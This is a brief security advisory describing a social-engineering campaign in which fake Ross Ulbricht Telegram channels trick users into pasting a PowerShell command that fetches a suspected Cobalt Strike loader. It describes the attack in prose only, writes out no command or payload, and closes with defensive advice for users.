Summary:
Threat actors are capitalizing on the recent news about Ross Ulbricht, founder of the infamous Silk Road marketplace, to trick users into downloading malware. Using fake, verified accounts on X (formerly Twitter), these actors direct unsuspecting users to Telegram channels masquerading as official portals for Ulbricht. Once there, victims are subjected to a fake identity verification process called "Safeguard." This process involves copying a PowerShell command into the clipboard, pasting it into the Windows Run dialog, and executing it. The malicious command downloads a ZIP file containing several files, including an executable suspected to be a Cobalt Strike loader, a tool frequently used by attackers for gaining remote access to systems, often preceding ransomware or data theft.

Security Officer Comments:
This attack mimics a popular "Click-Fix" tactic but rebrands it as a CAPTCHA or identity verification system to appear more convincing. The carefully crafted language and design aim to avoid raising suspicion, luring victims into compliance. Researchers from Guardio Labs and Infoblox recently highlighted similar campaigns leveraging CAPTCHA-like prompts to push PowerShell commands.

Suggested Corrections:
Users are strongly advised not to execute commands from unverified sources or paste anything into the Windows Run dialog unless they fully understand its purpose. Suspicious content copied to the clipboard should be examined for obfuscation, which is often a red flag. In response to this incident, Telegram has reiterated its commitment to monitoring and removing harmful content, stating that its moderators remove millions of violations daily to ensure platform safety.

Link(s):
https://www.bleepingcomputer.com/ne...ou-into-running-malicious-powershell-scripts/